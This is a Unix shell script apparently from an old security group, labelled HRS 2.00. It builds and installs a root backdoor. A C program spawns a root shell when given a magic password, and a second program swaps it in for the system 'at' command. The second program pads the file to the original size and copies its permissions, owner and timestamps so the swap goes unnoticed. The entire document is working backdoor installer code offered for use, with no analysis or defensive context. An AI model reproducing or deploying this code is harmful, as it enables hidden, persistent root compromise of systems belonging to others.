#!/bin/sh

#============================================================================
#  HRS Version 2.00
#  The Shadow Penguin Security (http://shadowpenguin.backsection.net)
#  Written by UNYUN (unewn4th@usa.net)
# ===========================================================================

echo "Checking Compiler ... "
cat > /tmp/test.c << -E-O-F-
main(){}
-E-O-F-
cc /tmp/test.c -o /tmp/test > /tmp/null
if test -x /tmp/test; then
CC=cc
rm /tmp/test
else
CC=gcc
fi
rm /tmp/test.c
rm /tmp/null
echo "Use "$CC

echo "Generating C Script..."
cat > /tmp/hrs.c << -E-O-F-
#define MAGIC           "R00tSH3ll"
#define ORIGINAL        "/.desktop-user"        
main(argc,argv)
int argc;
char *argv[];
{
        int     i;
        char    buffer[2000];

        setuid(0);
        setgid(0);
        if (argc==2 && strcmp(argv[1],MAGIC)==0){
                system("/bin/sh");
        }else{
                sprintf(buffer,"chmod 4755 %s",ORIGINAL);
                system(buffer);
                strcpy(buffer,ORIGINAL);
                for (i=0;i<argc-1;i++){
                        strcat(buffer," ");
                        strcat(buffer,argv[i+1]);
                }
                system(buffer);
        }
        sprintf(buffer,"chmod 644 %s",ORIGINAL); system(buffer);
} 
-E-O-F-
cat > /tmp/cpz.c << -E-O-F-
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <utime.h>

main(int argc,char *argv[])
{
    struct stat     st,st2;
    struct utimbuf  ut;
    FILE            *fp;
    int             i;
    char            buf[1000];
    char            targ[200];

    if (stat("/bin/at",&st)==0) strcpy(targ,"/bin/at");
    else if (stat("/usr/bin/at",&st)==0) strcpy(targ,"/usr/bin/at");
    else{  
        printf("can not find at command.\n"); exit(1);
    }
    stat(argv[1],&st2);
    sprintf(buf,"mv %s /.desktop-user",targ); system(buf);
    sprintf(buf,"mv %s %s",argv[1],targ);     system(buf);
    if ((fp=fopen(targ,"ab"))!=NULL){
        for (i=0;i<st.st_size-st2.st_size;i++)
            putc(rand()&0xff,fp);
        fclose(fp);
    }
    chmod(targ,st.st_mode);
    chown(targ,st.st_uid,st.st_gid);
    ut.actime=st.st_atime;
    ut.modtime=st.st_mtime;
    utime(targ,&ut);
    sprintf(buf,"chmod u+s %s",targ); /*Linux*/
    system(buf);
    printf("Your rootshell = '%s'\n",targ);
    exit(0);
}
-E-O-F-

echo "Compiling..."
$CC /tmp/hrs.c -o /tmp/hrs
rm /tmp/hrs.c
$CC /tmp/cpz.c -o /tmp/cpz
rm /tmp/cpz.c

/tmp/cpz /tmp/hrs

echo "done."